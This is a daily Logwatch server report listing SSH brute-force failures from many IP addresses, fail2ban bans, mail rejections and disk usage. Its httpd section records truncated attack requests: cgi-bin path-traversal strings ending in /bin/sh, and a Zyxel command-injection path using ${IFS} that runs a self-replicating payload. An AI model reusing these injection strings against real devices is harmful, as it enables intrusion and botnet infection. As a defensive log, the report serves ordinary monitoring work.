[TOPF] Logwatch for h2361197.stratoserver.net (Linux)

################### Logwatch 7.4.0 (03/01/11) #################### Processing Initiated: Fri Jan 19 04:42:03 2024 Date Range Processed: yesterday ( 2024-Jan-18 ) Period is day. Detail Level of Output: 0 Type of Output/Format: mail / text Logfiles for Host: h2361197.stratoserver.net ################################################################## --------------------- fail2ban-messages Begin ------------------------ Banned services with Fail2Ban: Bans:Unbans ssh: [110:110] ---------------------- fail2ban-messages End ------------------------- --------------------- httpd Begin ------------------------ Connection attempts using mod_proxy: 141.98.7.179 -> zapf.wiki:443: 3 Time(s) A total of 2 sites probed the server 185.100.87.136 66.240.205.34 Requests with error response codes 400 Bad Request zapf.wiki:443: 3 Time(s) *: 2 Time(s) /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2 ... %2e/.%2e/bin/sh: 2 Time(s) null: 2 Time(s) /: 1 Time(s) /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${I ... }zyxel.selfrep;: 1 Time(s) /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%3 ... 5%%32%65/bin/sh: 1 Time(s) mstshash=Administr: 1 Time(s) 403 Forbidden /FrcS3CFURGOhH8IZnOVeEw: 1 Time(s) 500 Internal Server Error /: 11 Time(s) /Public/home/js/check.js: 1 Time(s) /login: 1 Time(s) /robots.txt: 1 Time(s) /static/admin/javascript/hetong.js: 1 Time(s) /version: 1 Time(s) 502 Bad Gateway /CWNtLmX2SLelz0pnhfcNyA/pdf: 1 Time(s) ---------------------- httpd End ------------------------- --------------------- pam_unix Begin ------------------------ sshd: Authentication Failures: root (59.110.170.68): 20 Time(s) unknown (62.122.184.248): 19 Time(s) unknown (191.9.123.39): 15 Time(s) unknown (103.103.30.17): 12 Time(s) unknown (164.90.161.47): 12 Time(s) unknown (185.126.8.102): 12 Time(s) unknown (27.254.235.2): 12 Time(s) unknown (85.234.116.19): 12 Time(s) unknown (128.199.194.4): 11 Time(s) unknown (43.228.112.254): 10 Time(s) root (62.122.184.248): 9 Time(s) unknown (113.83.130.239): 9 Time(s) unknown (122.155.186.160): 9 Time(s) unknown (129.226.88.9): 9 Time(s) unknown (152.32.240.162): 9 Time(s) unknown (164.90.211.134): 9 Time(s) unknown (176.109.0.30): 9 Time(s) unknown (185.255.91.86): 9 Time(s) unknown (188.166.150.14): 9 Time(s) unknown (188.166.236.23): 9 Time(s) unknown (190.119.66.238): 9 Time(s) unknown (190.249.243.109): 9 Time(s) unknown (43.134.59.61): 9 Time(s) unknown (43.143.177.244): 9 Time(s) unknown (43.153.114.153): 9 Time(s) unknown (43.153.85.172): 9 Time(s) unknown (43.156.68.36): 9 Time(s) unknown (45.165.203.173): 9 Time(s) unknown (82.207.8.194): 9 Time(s) unknown (adsl-130-87-192-81.adsl2.iam.net.ma): 9 Time(s) unknown (137.184.118.88): 8 Time(s) unknown (222.73.56.10): 8 Time(s) unknown (150.242.140.105): 7 Time(s) unknown (162.14.116.233): 7 Time(s) root (116.62.134.75): 6 Time(s) root (159.203.96.83): 6 Time(s) root (182.253.36.38): 6 Time(s) root (222.186.16.207): 6 Time(s) root (ns397054.ip-94-23-34.eu): 6 Time(s) unknown (117.62.216.107): 6 Time(s) unknown (117.68.194.148): 6 Time(s) unknown (124.222.13.109): 6 Time(s) unknown (61.188.205.78): 6 Time(s) unknown (218.157.215.31): 2 Time(s) unknown (ip5f582ed6.dynamic.kabel-deutschland.de): 2 Time(s) daemon (62.122.184.248): 1 Time(s) root (27.254.235.2): 1 Time(s) unknown (101.42.3.219): 1 Time(s) unknown (104.248.234.84): 1 Time(s) unknown (185.196.8.151): 1 Time(s) unknown (ool-6038430a.static.optonline.net): 1 Time(s) Invalid Users: Unknown Account: 348 Time(s) ---------------------- pam_unix End ------------------------- --------------------- Postfix Begin ------------------------ 3 4xx Reject relay denied 100.00% -------- -------------------------------------------------- 3 Total 4xx Rejects 100.00% ======== ================================================== 51 Connections 16 Connections lost (inbound) 51 Disconnections ---------------------- Postfix End ------------------------- --------------------- Connections (secure-log) Begin ------------------------ **Unmatched Entries** systemd-logind: New seat seat0.: 1 Time(s) ---------------------- Connections (secure-log) End ------------------------- --------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------ Large Mailbox threshold: 40MB (41943040 bytes) Warning: Large mailbox: mailman.gz (1747199807) Warning: Large mailbox: mailman (235703599967) ---------------------- sendmail-largeboxes (large mail spool files) End ------------------------- --------------------- SSHD Begin ------------------------ Network Read Write Errors: 12 SSHD Started: 2 Time(s) Disconnecting after too many authentication failures for user: root : 2 Time(s) Failed logins from: 27.254.235.2: 1 time 59.110.170.68: 20 times 62.122.184.248: 10 times 94.23.34.95 (ns397054.ip-94-23-34.eu): 6 times 116.62.134.75: 6 times 159.203.96.83: 6 times 182.253.36.38: 6 times 222.186.16.207: 6 times Illegal users from: 2001:470:1:332::6 (scan-40af.shadowserver.org): 1 time undef: 284 times 27.254.235.2: 12 times 43.134.59.61: 9 times 43.143.177.244: 9 times 43.153.85.172: 9 times 43.153.114.153: 9 times 43.156.68.36: 9 times 43.228.112.254 (undefined.hostname.localhost): 10 times 45.165.203.173: 9 times 61.188.205.78 (78.205.188.61.broad.nj.sc.dynamic.163data.com.cn): 6 times 62.122.184.248: 19 times 65.49.1.60 (scan-55i.shadowserver.org): 1 time 66.240.192.82: 1 time 81.192.87.130 (adsl-130-87-192-81.adsl2.iam.net.ma): 9 times 82.207.8.194 (194-8-207-82.pool.ukrtel.net): 9 times 85.234.116.19: 12 times 95.88.46.214 (ip5f582ed6.dynamic.kabel-deutschland.de): 2 times 96.56.67.10 (ool-6038430a.static.optonline.net): 1 time 101.42.3.219: 1 time 103.103.30.17: 12 times 104.248.234.84: 1 time 113.83.130.239: 9 times 117.62.216.107: 6 times 117.68.194.148: 6 times 122.155.186.160: 9 times 124.222.13.109: 6 times 128.199.194.4: 11 times 129.226.88.9: 9 times 137.184.118.88: 8 times 150.242.140.105: 7 times 152.32.240.162: 9 times 162.14.116.233: 7 times 164.90.161.47: 12 times 164.90.211.134: 9 times 176.109.0.30: 9 times 185.126.8.102: 12 times 185.196.8.151: 1 time 185.255.91.86 (static.86.91.255.185.clients.irandns.com): 9 times 188.166.150.14: 9 times 188.166.236.23: 9 times 190.119.66.238: 9 times 190.249.243.109 (cable190-249-243-109.epm.net.co): 9 times 191.9.123.39 (191-9-123-39.user.vivozap.com.br): 15 times 218.157.215.31: 2 times 222.73.56.10: 8 times **Unmatched Entries** Disconnecting: Protocol error: expected packet type 21, got 20 [preauth] : 2 time(s) ---------------------- SSHD End ------------------------- --------------------- Disk Space Begin ------------------------ Filesystem Size Used Avail Use% Mounted on /dev/ploop23956p1 394G 243G 132G 65% / none 4.0G 0 4.0G 0% /dev ---------------------- Disk Space End ------------------------- ###################### Logwatch End #########################